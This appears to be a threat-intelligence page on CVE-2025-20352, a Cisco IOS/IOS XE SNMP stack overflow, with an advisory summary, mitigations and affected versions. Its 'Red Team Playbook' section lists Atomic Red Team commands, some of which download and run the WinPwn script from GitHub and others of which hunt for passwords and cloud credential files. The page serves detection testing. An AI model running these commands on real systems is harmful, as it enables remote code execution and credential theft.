CVE-2025-20352
Overview
This vulnerability is a stack-based buffer overflow in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE software. The flaw arises from improper handling of SNMP packets, specifically when processing SNMPv1, SNMPv2c, or SNMPv3 community strings or user credentials. The affected component is the SNMP service implementation, which fails to properly validate input size, leading to memory corruption within the SNMP processing stack.
Vulnerability Description
A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow the following: An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP.
Impact
An attacker with low-privileged SNMP credentials can cause a denial of service by forcing the device to reload, disrupting network operations. With administrative or privilege 15 credentials, an attacker can execute arbitrary code as the root user, gaining full control over the device. This enables unauthorized configuration changes, data interception, or lateral movement within the network. The attack requires authentication via SNMP community strings or SNMPv3 credentials, emphasizing the need for credential protection. The business impact includes potential network downtime and compromise of critical infrastructure devices.
Solution
Cisco has released security updates addressing this vulnerability in Cisco IOS XE SD-WAN versions 16.9.5 and later. Administrators should upgrade affected devices to these fixed versions as detailed in Cisco Security Advisory cisco-sa-snmp-x4LPhte. The advisory provides comprehensive patch instructions and recommends disabling unused SNMP services or restricting SNMP access to trusted hosts as interim mitigations.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE Software is characterized by a stack overflow condition that can be exploited by authenticated attackers. This flaw allows an attacker with low privileges to induce a denial of service (DoS) condition on the affected device, causing it to reload and become temporarily unavailable. In more severe scenarios, an attacker with high privileges can execute arbitrary code as the root user, gaining full control over the device. The exploitation requires the attacker to have access to the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials, which makes it particularly critical in environments where SNMP is used for network management.
The attack vectors for this vulnerability are primarily network-based, as the exploitation involves sending crafted SNMP packets to the affected devices over both IPv4 and IPv6 networks. An attacker could leverage this vulnerability to disrupt network services by causing devices to crash or become unresponsive. Additionally, if an attacker possesses higher privileges, they can execute malicious code, potentially leading to unauthorized access to sensitive data, manipulation of network configurations, or further lateral movement within the network. The ability to execute code as the root user poses a significant risk, as it allows for complete control over the device, which could be used to launch additional attacks or compromise other systems within the network.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely heavily on Cisco networking equipment for their operations. A successful attack could lead to significant downtime, loss of productivity, and potential data breaches. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if sensitive data is compromised. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust. The critical nature of network infrastructure means that any disruption can have cascading effects on business operations, making it essential for organizations to prioritize the mitigation of this vulnerability.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in network configurations and device settings. Monitoring SNMP traffic for unusual patterns or unauthorized access attempts can also serve as an early warning system for potential exploitation. Additionally, organizations should ensure that SNMP community strings are strong, unique, and not easily guessable. Where possible, transitioning to SNMPv3, which includes enhanced security features such as authentication and encryption, can significantly reduce the risk of exploitation. Finally, keeping Cisco IOS and IOS XE Software up to date with the latest security patches is crucial in protecting against known vulnerabilities.
In conclusion, the vulnerability within the SNMP subsystem of Cisco IOS and IOS XE Software presents a serious risk to network security. Its potential for exploitation by both low- and high-privileged attackers underscores the need for robust security measures and proactive management of network devices. Organizations must remain vigilant and adopt comprehensive security practices to safeguard their infrastructure against this and similar vulnerabilities.
CSURFACE threat intelligence has identified a nuanced shift in the exploitability profile of CVE-2025-20352. While telemetry indicates a significant reduction in detection activity related to this SNMP vulnerability, the Exploit Prediction Scoring System (EPSS) score has concurrently increased by over 20%, suggesting a growing potential for exploitation despite lower observed attack volumes. This divergence implies that although active exploitation attempts may be less frequent or more covert, the underlying risk remains elevated due to factors such as increased availability of proof-of-concept tools and continued inclusion in the KEV catalog. The current EPSS percentile ranking near the 0.87th percentile reinforces that this vulnerability remains a credible threat within the broader ecosystem. For defenders, this means that complacency is unwarranted; the environment may be primed for opportunistic or targeted attacks leveraging authenticated access to SNMP services. Consequently, the threat level should be considered stable to moderately heightened, reflecting persistent exploitation potential amid fluctuating attack visibility.
Affected Products (1096)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ios Xe Sd-Wan | 16.9.1 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.9.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.9.2 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.9.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.9.3 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.9.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.9.4 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.9.4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.1 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.1:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.2 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.2:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.3 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.3a |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.3a:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.3b |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.3b:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.4 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.5 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.5:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.10.6 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.10.6:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.11.1a |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.11.1a:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.1b |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.1b:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.1d |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.1d:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.1e |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.1e:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.2r |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.2r:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.3 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.3:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.4 |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.4:*:*:*:*:*:*:*
|
|
|
Cisco | Ios Xe Sd-Wan | 16.12.4a |
cpe:2.3:o:cisco:ios_xe_sd-wan:16.12.4a:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
scadastrangelove/CVE-2025-20352
CVE-2025-20352 SNMP Exposure Check (onesixtyone + parser)
|
scadastrangelove | 6 | 2 | 2025-09-25 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-20352 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-x4LPhte |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-20352 |